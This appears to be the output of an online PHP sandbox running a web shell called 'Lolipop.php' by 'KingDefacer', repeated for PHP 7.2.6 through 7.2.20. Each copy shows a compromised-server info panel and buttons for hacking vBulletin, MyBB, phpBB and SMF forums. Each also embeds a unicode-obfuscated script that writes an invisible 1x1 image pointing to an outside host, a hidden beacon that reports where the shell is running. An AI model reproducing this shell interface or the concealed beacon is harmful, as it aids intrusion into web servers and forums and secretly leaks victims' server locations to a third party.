cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.2.20
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.2.20</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.2.19
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.2.19</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.2.18
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.2.18</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.2.17
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.2.17</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.2.13
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.2.13</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.2.12
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.2.12</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.2.11
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.2.11</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.2.10
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.2.10</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.2.9
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.2.9</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.2.8
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.2.8</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.2.7
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.2.7</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.2.6
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.2.6</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> 